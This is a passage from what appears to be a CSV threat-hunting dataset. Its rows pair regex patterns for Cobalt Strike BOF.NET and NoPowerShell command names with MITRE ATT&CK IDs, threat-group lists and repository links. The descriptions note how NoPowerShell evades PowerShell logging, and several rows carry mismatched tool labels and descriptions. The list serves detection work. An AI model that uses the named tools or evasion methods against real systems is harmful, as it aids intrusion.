- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36143" 
"*bofnet_execute.*",".{0,1000}bofnet_execute\..{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36144" "*bofnet_execute.cpp*",".{0,1000}bofnet_execute\.cpp.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36145" "*bofnet_execute.cpp.x64.obj*",".{0,1000}bofnet_execute\.cpp\.x64\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36146" "*bofnet_execute.cpp.x64.obj*",".{0,1000}bofnet_execute\.cpp\.x64\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36147" "*bofnet_execute.cpp.x86.obj*",".{0,1000}bofnet_execute\.cpp\.x86\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36148" "*bofnet_execute.cpp.x86.obj*",".{0,1000}bofnet_execute\.cpp\.x86\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36149" "*bofnet_init*",".{0,1000}bofnet_init.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36150" "*bofnet_job *",".{0,1000}bofnet_job\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36151" "*bofnet_jobkill*",".{0,1000}bofnet_jobkill.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36152" "*bofnet_jobs*",".{0,1000}bofnet_jobs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36153" "*bofnet_jobstatus *",".{0,1000}bofnet_jobstatus\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36154" "*bofnet_list*",".{0,1000}bofnet_list.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol 
- Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36155" "*bofnet_listassembiles*",".{0,1000}bofnet_listassembiles.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 
Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36156" "*bofnet_load *",".{0,1000}bofnet_load\s.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36157" "*bofnet_load *.*",".{0,1000}bofnet_load\s.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 
AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36158" "*bofnet_shutdown*",".{0,1000}bofnet_shutdown.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36159" "*BOFNET_Tests*",".{0,1000}BOFNET_Tests.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36160" "*bofportscan *",".{0,1000}bofportscan\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","36161" "*bof-quser *.*",".{0,1000}bof\-quser\s.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - 